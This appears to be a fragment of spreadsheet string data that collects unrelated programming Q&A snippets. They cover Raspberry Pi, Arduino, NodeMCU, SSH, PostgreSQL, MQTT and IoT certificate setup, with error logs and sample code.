Uncomment the line that says # security = user by removing the # from the beginning of the line.</t>
  </si>
  <si>
    <t>; git clone https://github.com/foo/vendored /home/pi/go/src/github.com/foo/vendored
Cloning into '/home/pi/go/src/github.com/foo/vendored'...
fatal: could not read Username for 'https://github.com': terminal prompts disabled
package github.com/foo/vendored: exit status 128
Password: 
Indicating I would need to login: however I cannot seem to make this happen either.</t>
  </si>
  <si>
    <t>You must be Add application with below code to add those in AllowedExecutableFilesList registry in windows Iot core , so you need use below command to add applications or files to AllowedExecutableFilesList Key in windows registry: 
Go ahead, run the command above on your device, using SSH or PowerShell.</t>
  </si>
  <si>
    <t>Frequently Asked Questions
People often ask about the following Spring topics:
Spring Dependency Injection Autowiring Null
Casting a Spring's Proxy object to the actual runtime class
BeanFactory vs ApplicationContext
Guides:
Spring Guides and Tutorials
Video tutorial on Spring Framework
Spring's YouTube channel
Java Brains
Spring Tutorials Collections
Blog:
Spring Team Blog
Related tags
spring
spring-mvc
spring-security
spring-roo
spring-data
spring-integration
spring-webflow
spring-mobile
spring-social
spring-amqp
spring-portlet-mvc
spring-el
spring-batch
spring-boot
spring-xd
spring-android
spring-aop
spring-security
More information:
Spring Framework Wikipedia Article</t>
  </si>
  <si>
    <t>The code I am running is
I tried doing this
And now I get the error
 Invalid Syntax
I also tried this
 sudo idle3
and I got this
Client is not authorized to connect to ServerTraceback (most recent
  call last):    File "/usr/bin/idle3", line 5, in 
       main()    File "/usr/lib/python3.2/idlelib/PyShell.py", line 1405, in main
       root = Tk(className="Idle")    File "/usr/lib/python3.2/tkinter/init.py", line 1701, in init
       self.tk = _tkinter.create(screenName, baseName, className, interactive, wantobjects, useTk, sync, use)  _tkinter.TclError:
  couldn't connect to display ":1.0
Any thoughts on how to solve any of these?</t>
  </si>
  <si>
    <t>If you're using pip, you can do:
Example which I have tested personally:
from googleapiclient import discovery
from httplib2 import Http
from oauth2client.service_account import ServiceAccountCredentials
# BEGIN CONFIG
PRIVATE_KEY_JSON = 'path/to/service_account_private_key.json'
API_SCOPES = ['https://www.googleapis.com/auth/pubsub']
PROJECT_NAME = 'FILL_IN_PROJECT_NAME_HERE'
# END CONFIG
# The format of project name expected by PubSub
PROJECT = 'projects/{0}'.format(PROJECT_NAME)
# Create a ServiceAccountCredentials object by reading the credentials from
# your JSON file.</t>
  </si>
  <si>
    <t>Since this seems to be the solution:
You simply have one SSH connection to the machine that calls a single script:
That script will call all of your functions:
The &amp; at the end of the line means that the command for that line will be run in the background and bash will not wait for that line to finish before starting the next one.</t>
  </si>
  <si>
    <t>After following the advices from comments, i added the following lines in tomcat starting script :
Environment='CATALINA_OPTS=-Xms64M -Xmx192M -server -XX:+UseParallelGC -XX:+UnlockCommercialFeatures -XX:+FlightRecorder'
Environment='JAVA_OPTS=-Djava.awt.headless=true -Djava.security.egd=file:/dev/./urandom -Dcom.sun.management.jmxremote.port=7091 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false'
and i connected Java Mission Control and Flight Recording to raspberry's JVM.</t>
  </si>
  <si>
    <t>References:
About private packages
Creating and publishing private packages</t>
  </si>
  <si>
    <t>I am following this tutorial https://canox.net/2016/06/die-eigene-cloud-mit-dem-raspberry-pi-und-nextcloud/
after replacing nginx config with nextcloud and creating a certificate for lets encrypt, I restarted the service with
I get
systemctl status nginx.service:
 nginx.service - A high performance web server and a reverse proxy server
   Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: en
   Active: failed (Result: exit-code) since Sun 2018-06-17 10:56:58 UTC; 37s ago
     Docs: man:nginx(8)
  Process: 619 ExecStartPre=/usr/sbin/nginx -t -q -g daemon on; master_process o
Jun 17 10:56:58 raspberrypi systemd[1]: Starting A high performance web server a
Jun 17 10:56:58 raspberrypi nginx[619]: nginx: [emerg] BIO_new_file("/etc/letsen
Jun 17 10:56:58 raspberrypi nginx[619]: nginx: configuration file /etc/nginx/ngi
Jun 17 10:56:58 raspberrypi systemd[1]: nginx.service: Control process exited, c
Jun 17 10:56:58 raspberrypi systemd[1]: Failed to start A high performance web s
Jun 17 10:56:58 raspberrypi systemd[1]: nginx.service: Unit entered failed state
Jun 17 10:56:58 raspberrypi systemd[1]: nginx.service: Failed with result 'exit-
lines 1-13/13 (END)
 nginx.service - A high performance web server and a reverse proxy server
   Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
   Active: failed (Result: exit-code) since Sun 2018-06-17 10:56:58 UTC; 37s ago
     Docs: man:nginx(8)
  Process: 619 ExecStartPre=/usr/sbin/nginx -t -q -g daemon on; master_process on; (code=exited, status=1/FAILURE)
Jun 17 10:56:58 raspberrypi systemd[1]: Starting A high performance web server and a reverse proxy server...
Jun 17 10:56:58 raspberrypi nginx[619]: nginx: [emerg] BIO_new_file("/etc/letsencrypt/live/quinter.spdns.org/fullchain.pem"
Jun 17 10:56:58 raspberrypi nginx[619]: nginx: configuration file /etc/nginx/nginx.conf test failed
Jun 17 10:56:58 raspberrypi systemd[1]: nginx.service: Control process exited, code=exited status=1
Jun 17 10:56:58 raspberrypi systemd[1]: Failed to start A high performance web server and a reverse proxy server.</t>
  </si>
  <si>
    <t>Listing cameras
[]
Traceback (most recent call last):
  File "camtest.py", line 56, in &lt;module&gt;
    cam.start()
SystemError: Cannot open '/dev/video0': 13, Permission denied
Run 5:
Initialized pygame.</t>
  </si>
  <si>
    <t>Thanks for your help :)
edit: just ran ldd libssl.so on the raspberry and got
/usr/lib/arm-linux-gnueabihf/libcofi_rpi.so (0xb6ec6000)
libcrypto.so.1.0.0 =&gt; /usr/lib/arm-linux-gnueabihf/libcrypto.so.1.0.0 (0xb6d57000)
libdl.so.2 =&gt; /lib/arm-linux-gnueabihf/libdl.so.2 (0xb6d4c000)
libz.so.1 =&gt; /lib/arm-linux-gnueabihf/libz.so.1 (0xb6d2e000)
libc.so.6 =&gt; /lib/arm-linux-gnueabihf/libc.so.6 (0xb6bff000)
/lib/ld-linux-armhf.so.3 (0xb6f24000)
libgcc_s.so.1 =&gt; /lib/arm-linux-gnueabihf/libgcc_s.so.1 (0xb6bd7000)
edit 2: If I run cmake with -DCMAKE_SKIP_BUILD_RPATH=FALSE -DCMAKE_BUILD_WITH_INSTALL_RPATH=FALSE -DCMAKE_INSTALL_RPATH=/home/gervasio/raspberrypi/rootfs/lib/arm-linux-gnueabihf -DCMAKE_INSTALL_RPATH_USE_LINK_PATH=TRUE I get this output
/home/gervasio/raspberrypi/tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian/bin/arm-linux-gnueabihf-g++    -Wall    CMakeFiles/cpp-netlib-message_test.dir/message_test.cpp.o  -o ../../../tests/cpp-netlib-message_test -rdynamic /home/gervasio/raspberrypi/rootfs/usr/lib/libboost_unit_test_framework.a /home/gervasio/raspberrypi/rootfs/usr/lib/libboost_system.a /home/gervasio/raspberrypi/rootfs/usr/lib/libboost_regex.a /home/gervasio/raspberrypi/rootfs/usr/lib/libboost_date_time.a /home/gervasio/raspberrypi/rootfs/usr/lib/libboost_thread.a -lpthread /home/gervasio/raspberrypi/rootfs/usr/lib/libboost_filesystem.a /home/gervasio/raspberrypi/rootfs/usr/lib/libboost_program_options.a /home/gervasio/raspberrypi/rootfs/usr/lib/libboost_chrono.a -lpthread ../src/libcppnetlib-uri.a /home/gervasio/raspberrypi/rootfs/usr/lib/arm-linux-gnueabihf/libssl.so /home/gervasio/raspberrypi/rootfs/usr/lib/arm-linux-gnueabihf/libcrypto.so -lrt -Wl,-rpath,/home/gervasio/raspberrypi/rootfs/usr/lib/arm-linux-gnueabihf 
/home/gervasio/raspberrypi/tools/arm-bcm2708/gcc-linaro-arm-linux-gnueabihf-raspbian/bin/../lib/gcc/arm-linux-gnueabihf/4.7.2/../../../../arm-linux-gnueabihf/bin/ld: warning: libz.so.1, needed by /home/gervasio/raspberrypi/rootfs/usr/lib/arm-linux-gnueabihf/libssl.so, not found (try using -rpath or -rpath-link)
where it says -rpath,/home/gervasio/raspberrypi/rootfs/usr/lib/arm-linux-gnueabihf that doesn't seem ok, right?</t>
  </si>
  <si>
    <t>You will need a cursor variable to know into which slot of the array you need to write when the next key is pressed so you can do some kind of loop like this:
If you want to use a terminating character (lets say your keyboard have 0-9 and A-F keys, we could say the F is the terminating key), the code changes for something like:
bool checkPassword() {
    static const int expected[4] = {4,8,6,7}; // our password
    int input[4] = {0};
    // Get the next 4 key presses
    for (unsigned cursor = 0; cursor &lt; 4; ++cursor) {
        int key = keypad.getKey();
        // if F is pressed too early, then it fails
        if (key == 15) {
            return false;
        }
        // store the keypress value in our input array
        input[cursor] = key;
    }
    // If the key pressed here isn't F (terminating key), it fails
    if (keypad.getKey() != 15)
        return false;
    // Check if input equals expected
    for (unsigned i = 0; i &lt; 4; ++i) {
        // If it doesn't, it fails
        if (expected[i] != input[i]) {
            return false;
        }
    }
    // If we manage to get here the password is right :)
    return true;
}
Now you can use the checkPassword function in your main function like this:
int main() {
    while (true) {
        if (checkPassword())
            //unlock the thing
    }
    return 0;
}
NB: Using a timer sounds possible too (and can be combined with the terminating character option, they are not exclusive).</t>
  </si>
  <si>
    <t>I installed postgresql with command below:
Then I set a password for postgres user:
Added below line to /etc/postgresql/9.4/main/pg_hba.conf
host  all  all 192.168.1.0/24 md5
and below line to /etc/postgresql/9.4/main/postgresql.conf
listen_addresses = '*'
Finally I restarted postgresql service:
sudo /etc/init.d/postgresql reload
sudo /etc/init.d/postgresql restart
But when I tried to connect to postgresql server from another pc in 192.168.1.0/24 network I get "server doesn't listen" error from pgadmin.</t>
  </si>
  <si>
    <t>Here is part of my Arduino code where I create the jsonArray object:
Here is the JSONArray invalid function:
static JsonArray &amp;invalid() {
    static JsonArray instance(NULL);
    return instance;
}
Here is the JSONObject invalid function:
// Returns a reference an invalid JsonObject.</t>
  </si>
  <si>
    <t>However, When I set the profile, I get this message:
An unexpected error occurred while tokenizing input file
  /usr/local/lib/python2.7/dist-packages/selenium/webdriver/firefox/firefox_binary.pyc
  The following traceback may be corrupted or invalid The error message
  is: ('EOF in multi-line statement', (7, 0))
I really don't understand why... Do anyone have a solution?</t>
  </si>
  <si>
    <t>:
1) Set up SD card image
use etcher to burn 2018-10-09-raspbian-stretch.img
touch /boot/ssh
add a suitable /boot/wpa_supplicant.conf file
edit /rootfs/etc/hostname
2) ssh-copy-id from host to pi, for convenient SSH
3) Set up software on the pi:
sudo apt update; sudo apt dist-upgrade
sudo apt install vim git screen htop rpi-update
sudo apt autoremove
sudo systemctl set-default multi-user.target # don't start X windows on boot
sudo BRANCH=next rpi-update
sudo reboot
4) Update bluez
sudo apt install libdbus-1-dev libglib2.0-dev libudev-dev libical-dev libreadline-dev
wget http://www.kernel.org/pub/linux/bluetooth/bluez-5.50.tar.xz
tar -xf bluez-5.50.tar.xz`
cd bluez-5.50/
./configure --prefix=/usr --mandir=/usr/share/man --sysconfdir=/etc --localstatedir=/var --enable-experimental
make -j4
sudo make install
sudo cp /etc/dbus-1/system.d/bluetooth.conf /etc/dbus-1/system.d/bluetooth.conf.bak, then edit:
add to root: &lt;allow send_interface="org.bluez.ThermometerWatcher1"/&gt;&lt;allow send_interface="org.bluez.HeartRateWatcher1"/&gt;&lt;allow send_interface="org.bluez.CyclingSpeedWatcher1"/&gt;
add new child of busconfig: &lt;policy group="bluetooth"&gt;&lt;allow send_destination="org.bluez"/&gt;&lt;/policy&gt;
5) Get bluetooth working
sudo adduser pi bluetooth
sudo reboot
bluetoothctl: scan on
bluetoothctl: trust 04:52:C7:5A:3B:A1
bluetoothctl: connect 04:52:C7:5A:3B:A1
aplay -D bluealsa:HCI=hci0,DEV=04:52:C7:5A:3B:A1,PROFILE=a2dp /usr/share/sounds/alsa/Front_Center.wav # test it works at all
6) Get bluetooth working without specifying the device by creating the following /etc/asound.conf file:
pcm.bose {
 type plug
  slave {
    pcm {
      type bluealsa
      interface hci0
      device 04:52:C7:5A:3B:A1
      profile "a2dp"
    }
  }
  hint {
    show on
    description "Bose speaker"
  }
}
pcm.</t>
  </si>
  <si>
    <t>There is some hand waiving around the "common secret" since its actually the result of applying a Key Agreement function, and it uses the recipient's static public key and an ephemeral key pair.</t>
  </si>
  <si>
    <t>return GetDefaultCharBitmask();
    }
    private int GetDefaultCharBitmask()
    {
        return BITMASK_DICTIONARY[DEFAULT_BITMASK_CHAR];
    }
    public void Show(string message)
    {
        // Ensure message has valid length.</t>
  </si>
  <si>
    <t>Grunt-prompt is a Grunt task that lets you Add interactive UI to your Gruntfile such as lists, checkboxes, text input with filtering, and password fields, all on the command line
Some Useful Links
grunt-prompt GitHub Repo
grunt-prompt NPM package</t>
  </si>
  <si>
    <t>File name: C:\Users\mwhit_000\Desktop\Capstone\Security_System\Security_System2\Security_System2.ino
Line number: 27
Column: 38
Type of error: Warning
Description: deprecated conversion from string constant to 'char*' [-Wwrite-strings] 
Error line: Password password = Password( "1234" );
So this is quite literally telling you you are converting a constant string into a non-constant string right the freak here: Password password = Password( "1234" );
Why is this bad?</t>
  </si>
  <si>
    <t>Taking the default mosquitto.conf add the following:
Then use  to create the password file
mosquitto_passwd -c /etc/mosquitto/passwd test
Then restart mosquitto with service mosquitto restart
(restarting the service after adding the password is important as the file is read at start up, or when mosquitto receives a HUP signal)
you should now be able to connect with the following mosquitto_sub command
mosquitto_sub -t hello/world -u test -P test
you can tail the /var/log/mosquitto/mosquitto.log file to see if there are any errors</t>
  </si>
  <si>
    <t>mai 27 13:42:56 raspberrypi polkitd(authority=local)[810]: Unregistered Authentication Agent for unix-process:4643:531066 (system bus name :1.49, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale fr_FR.UTF-8) (disconnected from bus)
lines 1835-1857/1857 (END)
How can I solve this problem ?</t>
  </si>
  <si>
    <t>From the shell you could do it like this:
To run a shell command from in Python:
Or, as Eevee suggested below:
import subprocess
subprocess.call(['ssh pi@theraspberrypi ./myscript'], shell=True)
Of course, you will probably want to put your public key in the raspberry pi's authorized_keys file so it won't prompt for a password.</t>
  </si>
  <si>
    <t>Exit Values
The userdel command exits with the following values:
0   success
1   can't update password file
2   invalid command syntax
6   specified user doesn't exist
8   user currently logged in
10   can't update group file
12   can't remove home directory</t>
  </si>
  <si>
    <t>Some exit codes are:
The config file is invalid (ret=3),
Can not write to the config file (ret=4),
No section or name was provided (ret=2),
The section or key is invalid (ret=1),
You try to unset an option which does not exist (ret=5),
You try to unset/set an option for which multiple lines match (ret=5), or
You try to use an invalid regexp (ret=6).</t>
  </si>
  <si>
    <t>The main new features in XPath 3.1 are the addition of maps and arrays to facilitate JSON processing and the arrow operator  which allows writing nested function calls like tokenize((normalize-unicode(upper-case($string))),"\s+") as $string =&gt; upper-case() =&gt; normalize-unicode() =&gt; tokenize("\s+") instead.</t>
  </si>
  <si>
    <t>Start At Login
Make sure you are in the pi folder:
 $ cd ~
Create a file and write a script to run in the file:
 $ sudo nano superscript
Paste contents of sh script here
 Save and exit: Ctrl+X, Y, Enter
Open up .bashrc for configuration:
 $ sudo nano .bashrc
Scroll down to the bottom and add the line: ./superscript
 Save and exit: Ctrl+X, Y, Enter
3.</t>
  </si>
  <si>
    <t>secret: null, // null so the clients do not have control of the master presentation
        id: '1ea875674b17ca76', // id, obtained from socket.io server
        url: 'example.com:80' // Location of your socket.io server
    },
    // Don't forget to add the dependencies
    dependencies: [
        { src: '//cdnjs.cloudflare.com/ajax/libs/socket.io/0.9.10/socket.io.min.js', async: true },
        { src: 'plugin/multiplex/client.js', async: true }
        // other dependencies...
    ]
It can also play the role of static file server for your master presentation and client presentations at the same time (as long as you don't want to use speaker notes).</t>
  </si>
  <si>
    <t>I'm installing  on raspberry pi 3 using pip:
But when I used import google.auth, I get the following error No module named 'google.auth'
(env) pi@raspberrypi:~/Desktop $ python
Python 3.5.3 (default, Sep 27 2018, 17:25:39)
[GCC 6.3.0 20170516] on linu
Type "help", "copyright", "credits" or "license" for more information
&gt;&gt;&gt; import google.auth
 Traceback (most recent call last)
 File "&lt;stdin&gt;", line 1, in &lt;module
ImportError: No module named 'google.auth</t>
  </si>
  <si>
    <t>This is the version I would write
Class Base {
public:
  boolean receiveByte();  // the accessors are public
protected:
  uint8_t buffer[ 20 ];  // the data is encapsulated
  uint8_t bufferLength;
}
boolean MyClass::receiveByte() {
  if( Serial.available() &gt; 0 )  {
    bufferLength++;
    // you would insert protection against overflow here
    buffer[bufferLength] = Serial.read();
    return( true );
  }
  return( false );
}
Class MyClass : public Base {
public:
  void execute( void );
}
void MyClass::execute( void )  {
  if( receiveByte() == true ) {
    // Do something
  }
}</t>
  </si>
  <si>
    <t>I've such code:
 method causes PANIC error, an it results in following console output:
AAAAAAA
PANIC: unprotected error in call to Lua API (json.lua:166: 'for' initial value must be a number)
Whole program beaks, BBBBB does not get printed to console.</t>
  </si>
  <si>
    <t>To be reentrant a subroutine, function, method etc must:
hold no static (or global) non-constant data
not return the address to static (or global) non-constant data
work only on the data provided to it by the caller
not rely on locks to singleton resources
A reentrant mutex's lock can be acquired multiple times by the same thread.</t>
  </si>
  <si>
    <t>Typical functions of a package management system include:
Working with file archivers to extract package archives
Ensuring the integrity and authenticity of the package by verifying their digital certificates and checksums
Looking up, downloading, installing or updating existing software from a software repository or app store
Grouping packages by function to reduce user confusion
Managing dependencies to ensure a package is installed with all packages it requires, thus avoiding "dependency hell"</t>
  </si>
  <si>
    <t>in the address bar (alphanumeric string)
Create configuration file of inadyn:
sudo gedit /etc/inadyn.conf
And save this content:
--username &lt;your_username&gt;
--password &lt;your_password&gt;
--update_period 60000
--forced_update_period 320000
--alias &lt;your_host&gt;.ignorelist.com,alphanumeric string
--background
--dyndns_system default@freedns.afraid.org
--syslog
Add inadyn to crontab:
export EDITOR=gedit &amp;&amp; sudo crontab -e
Edit the file to add the following line:
@reboot /usr/sbin/inadyn
Reboot your PC
  Wait 3 minutes
  Check if inadyn is running:
ps -A | grep inadyn
Check inadyn behaviour:
more /var/log/messages |grep INADYN
Check if your host is up:
ping &lt;your_host&gt;.ignorelist.com</t>
  </si>
  <si>
    <t>AWS CLI
As you mention the CLI is also an option
Will return
{
    "certificateDescription": {
        "certificateArn": "arn:aws:iot:eu-central-1:xxxxxx", 
        "status": "ACTIVE", 
        "certificateId": "fcd371fcd371fcd371fcd371fcd371fcd371fcd371fcd371fcd371fcd371fcd3", 
        "lastModifiedDate": 1519840881.49, 
        "certificatePem": "-----BEGIN CERTIFICATE-----\nMIIDsTCCApmg.....VsAzFQ==\n-----END CERTIFICATE-----\n", 
        "transferData": {}, 
        "ownedBy": "123456789", 
        "creationDate": 1519840820.888
    }
Amazon IoT SDK 
Can also be used to retrieve the certificate content (PEM format) as a String based on a certificate ID (that you can output via cloudformation)
import com.amazonaws.services.iot.AWSIot;
import com.amazonaws.services.iot.AWSIotClientBuilder;
import com.amazonaws.services.iot.model.DescribeCertificateRequest;
import com.amazonaws.services.iot.model.DescribeCertificateResult;
DescribeCertificateRequest describeCertificateRequest = new DescribeCertificateRequest();
describeCertificateRequest.setCertificateId("fcd371fcd371fcd371fcd371fcd371fcd371fcd371fcd371fcd371fcd371fcd3");
DescribeCertificateResult describeCertificateResult = awsIot.describeCertificate(describeCertificateRequest);
describeCertificateResult.getCertificateDescription().getCertificatePem();
AFAIK it is not possible to output it as a variable within a cloudformation template.</t>
  </si>
  <si>
    <t>I get the a string from the Android, I put the array of received bytes into an array, I converted the array to a string and I tested it to check if it is a string and I checked the length of the string and it all appears to be legit but I can't identify if my identifier is in the string to extract the data.</t>
  </si>
  <si>
    <t>The normal way to add username and password to an url is:
If that doesn't work, try adding them to the wget command line as explained in the manual:
wget -O [filenamepath] --user=user --password=1234 http://192.168.1.110:8080/snapshot.cgi?count=3
ps: you cannot test the url with embedded username and password with IE because some time ago Microsoft decided to stop supporting that feature.</t>
  </si>
  <si>
    <t>I do recommend to read the following documents:
Manage your IoT Hub device identities in bulk
Reference - IoT Hub quotas and throttling 
where:
Identity registry operations (create, retrieve, list, update, delete)
    Free, B1 and S1  =  1.67/sec/unit (100/min/unit)
    B2 and S2 =         1.67/sec/unit (100/min/unit)
    B3 and S3 = 83.33/sec/unit (5000/min/unit)</t>
  </si>
  <si>
    <t>The problem I am having is when I have two commands trying to access the port at the same time, which is the UnauthroizedAccessException catch statement, it outputs the errormessage, and doesn't execute one of the commands, How could I go about coding that catch statement so that instead of catching the error or even making it to the error for the program to finish the first command and then execute with other one, something like a queue....</t>
  </si>
  <si>
    <t>3/12/2019 8:53:11 AM info: iotedged -- Initializing hsm...
3/12/2019 8:53:11 AM info: iotedged -- Configuring the trusted CA certificates using
                     "C:\\ADNM\\IoTEdge\\ssl\\certs\\azure-iot-test-only.root.ca.cert.pem".</t>
  </si>
  <si>
    <t>Okay, it looks like you can pass options to the  constructor that will be passed on to SSHClient.connect
Note it's generally a bad idea to store your passwords in plain text, especially in code.</t>
  </si>
  <si>
    <t>Unchecked exceptions do not need to be declared in a method or constructor's throws clause if they can be thrown by the execution of the method or constructor and propagate outside the method or constructor boundary.</t>
  </si>
  <si>
    <t>I use the following function:
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
global Con # nected
con=0
        def SSHConnection():
            global con
            while True:
                try:
                    ssh.connect(IP,username=User,password=Password)
                    con=1
                    break
                except:
                    tkMessageBox.showwarning("Error!</t>
  </si>
  <si>
    <t>I have also added public key which is used to authenticate device using public/private key pair it was added successfully.</t>
  </si>
  <si>
    <t>So I got the server certificate by this command 
and removed two lines from the top and two lines from the bottom.</t>
  </si>
  <si>
    <t>Sample code
apIPCfg={}
apCfg={}
   apCfg.ssid="abcdefgh"
   apCfg.pwd="abcdefgh12345678"
   apCfg.auth=AUTH_WPA2_PSK
   apIPCfg.ip='10.100.0.1'
   apIPCfg.netmask='255.255.255.240'
   apIPCfg.gateway='10.100.0.1'
   wifi.setmode(wifi.STATIONAP)
   wifi.ap.setip(apIPCfg)
   wifi.ap.config(apCfg)
Build details
NodeMCU custom build by frightanic.com
        branch: dev
        commit: 7d576efed94092916e1a84bccba6319d62b9dedf
        SSL: true
        modules: adc,bit,cjson,coap,crypto,encoder,enduser_setup,file,gpio,http,mqtt,net,node,struct,tmr,uart,wifi
 build  built on: 2016-04-08 07:08
 powered by Lua 5.1.4 on SDK 1.5.1(e67da894)
lua: cannot open init.lua
&gt; apIPCfg={}
&gt; apCfg={}
&gt;    apCfg.ssid="abcdefgh"
&gt;    apCfg.pwd="abcdefgh12345678"
&gt;    apCfg.auth=AUTH_WPA2_PSK
&gt;    apIPCfg.ip='10.100.0.1'
&gt;    apIPCfg.netmask='255.255.255.240'
&gt;    apIPCfg.gateway='10.100.0.1'
&gt;    wifi.setmode(wifi.STATIONAP)
&gt;    wifi.ap.setip(apIPCfg)
&gt;    wifi.ap.config(apCfg)
&gt; ip, nm, gw = wifi.ap.getip()
&gt; print("AP IP Info ip nm gw:",ip, nm, gw)
AP IP Info ip nm gw:    10.100.0.1      255.255.255.240 10.100.0.1
&gt;</t>
  </si>
  <si>
    <t>06-17 16:34:35.930  11800-11818/com.example.biggus.system_4 I/OpenGLRenderer Initialized EGL, version 1.4
  06-17 16:34:35.950  11800-11818/com.example.biggus.system_4 I/OpenGLRenderer HWUI protection enabled for context ,  &amp;this =0xb3922088 ,&amp;mEglDisplay = 1 , &amp;mEglConfig = 8
  06-17 16:34:35.950  11800-11818/com.example.biggus.system_4 D/OpenGLRenderer Enabling debug mode 0
  06-17 16:34:36.090  11800-11800/com.example.biggus.system_4 I/Timeline Timeline: Activity_idle id: android.os.BinderProxy@346384f1 time:13135175
  06-17 16:34:37.870  11800-11800/com.example.biggus.system_4 D/ViewRootImpl ViewPostImeInputStage ACTION_DOWN
  06-17 16:34:40.740  11800-11800/com.example.biggus.system_4 D/ViewRootImpl ViewPostImeInputStage ACTION_DOWN
  06-17 16:34:43.850  11800-11800/com.example.biggus.system_4 D/ViewRootImpl ViewPostImeInputStage ACTION_DOWN
  06-17 16:34:43.930  11800-11800/com.example.biggus.system_4 I/Timeline Timeline: Activity_launch_request id:com.example.biggus.system_4 time:13143016
  06-17 16:34:44.060  11800-11800/com.example.biggus.system_4 I/System.out Providergpshas been selected
  06-17 16:34:44.070  11800-11800/com.example.biggus.system_4 D/AndroidRuntime Shutting down VM
  06-17 16:34:44.070  11800-11800/com.example.biggus.system_4 E/AndroidRuntime FATAL EXCEPTION: main
      Process: com.example.biggus.system_4, PID: 11800
      java.lang.RuntimeException: Unable to start activity ComponentInfo{com.example.biggus.system_4/com.example.biggus.system_4.Location_Informaion}: java.lang.NullPointerException: Attempt to invoke virtual method 'void com.example.biggus.system_4.Location_Informaion$ConnectedThread.write(java.lang.String)' on a null object reference
              at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2658)
              at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2725)
              at android.app.ActivityThread.access$900(ActivityThread.java:172)
              at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1422)
              at android.os.Handler.dispatchMessage(Handler.java:102)
              at android.os.Looper.loop(Looper.java:145)
              at android.app.ActivityThread.main(ActivityThread.java:5834)
              at java.lang.reflect.Method.invoke(Native Method)
              at java.lang.reflect.Method.invoke(Method.java:372)
              at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:1388)
              at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1183)
       Caused by: java.lang.NullPointerException: Attempt to invoke virtual method 'void com.example.biggus.system_4.Location_Informaion$ConnectedThread.write(java.lang.String)' on a null object reference
              at com.example.biggus.system_4.Location_Informaion.onLocationChanged(Location_Informaion.java:283)
              at com.example.biggus.system_4.Location_Informaion.onCreate(Location_Informaion.java:89)
              at android.app.Activity.performCreate(Activity.java:6221)
              at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1119)
              at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2611)
              at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2725)
              at android.app.ActivityThread.access$900(ActivityThread.java:172)
              at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1422)
              at android.os.Handler.dispatchMessage(Handler.java:102)
              at android.os.Looper.loop(Looper.java:145)
              at android.app.ActivityThread.main(ActivityThread.java:5834)
              at java.lang.reflect.Method.invoke(Native Method)
              at java.lang.reflect.Method.invoke(Method.java:372)
              at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:1388)
              at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1183)</t>
  </si>
  <si>
    <t>Create an empty file called ssh just using:
Create a file called wpa_supplicant.conf with your WiFi settings - be very sure that Windows hasn't added any .txt extension:
country=US
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
network={
    ssid="NETWORK-NAME"
    psk="NETWORK-PASSWORD"
}
Once it works, and you can ssh successfully into the Raspberry Pi, be sure to run:
sudo raspi-config
and permanently enable ssh for subsequent reboots.</t>
  </si>
  <si>
    <t>NodeMCU info
Error I get when I try to send HTTP response with big json string response ()
PANIC: unprotected error in call to Lua API (file.lua:5: out of memory)
Code:
  -- a simple HTTP server
    srv = net.createServer(net.TCP)
    srv:listen(80, function(conn)
        conn:on("receive", function(sck, payload)
            sck:send("HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"..json_response)
        end)
        conn:on("sent", function(sck) sck:close() end)
    end)</t>
  </si>
  <si>
    <t>If you can ssh into the Pi using Putty and the Pi's IP address then
Scroll down to the bottom of the file and remove the offending program, then sudo reboot
They way to prevent this issue from happening is to add an &amp; (ampersand) to the end of the line to fork the process and run it as a separate process like so
as specified in https://www.raspberrypi.org/documentation/linux/usage/rc-local.md
The ampersand allows the command to run in a separate process and continue booting with the process running.</t>
  </si>
  <si>
    <t>Python
The  is raised only when the index is out of bounds:
However invalid entries will raise a typeerror.</t>
  </si>
  <si>
    <t>Disable access point : 
sudo sustemctl disable hostapd dnsmasq
comment the static ip config in /etc/dhcpcd.conf
sudo reboot
Enable access point
sudo sustemctl enable hostapd dnsmasq
comment the static ip config in /etc/dhcpcd.conf
sudo reboot
The difference is intead of just stopping the 2 services I completely disable them.</t>
  </si>
  <si>
    <t>I have a function which gets 2 parameters which i would like to insert as a part of a new string creating :
I would like to have  , to be with the 2 arguments that this function gets ( missed-&gt;said , my password-&gt;pass )
How would i create such a string ?</t>
  </si>
  <si>
    <t>If I try to specify my own test_ca_cert, I always get:
CA cert: mbedtls_x509_crt_parse returned -0x2180 (which is an error code for "invalid format")
I have tried a multitude of things for the test_ca_cert such as a string with the PEM formatted (cleartext) base64 encoded certificate, and a byte array of the DER formatted certificates.</t>
  </si>
  <si>
    <t>try something like this
you need to do this because when you say  it just returns whatever key is held down and since you are callign it several times per second you need to have very quick fingers in order to register only a single result
it would probably be better to encapuslate your logic into discreet blocks
def getKeyUp():
    while kp.getKey() is None:
        pass
    released = None
    while True
        if kp.getKey() is None:
             return released
        released = kp.getKey() 
code = [getKeyUp() for _ in range(4)]
print "Got Code:",code</t>
  </si>
  <si>
    <t>The "Invalid Argument" error from your  call probably means that your mreq argument was bad.</t>
  </si>
  <si>
    <t>This particular declaration in  is incorrect:
because when the TYPE field is local, the line must have 4 fields, not 5: there is no ADDRESS field because it doesn't apply to Unix domain sockets (which is what local really means), only to TCP connections (which are declared with TYPE being host or hostssl)
When you reload PostgreSQL with a pg_hba.conf with this line, it will fail with 
LOG:  invalid authentication method "127.0.0.1/32"
but you will see that only if looking in the server log.</t>
  </si>
  <si>
    <t>if not (self.Read_MFRC522(self.Status2Reg) &amp; 0x08) != 0:
      print "AUTH ERROR(status2reg &amp; 0x08) != 0"
    return status
  def MFRC522_Read(self, blockAddr):
    recvData = []
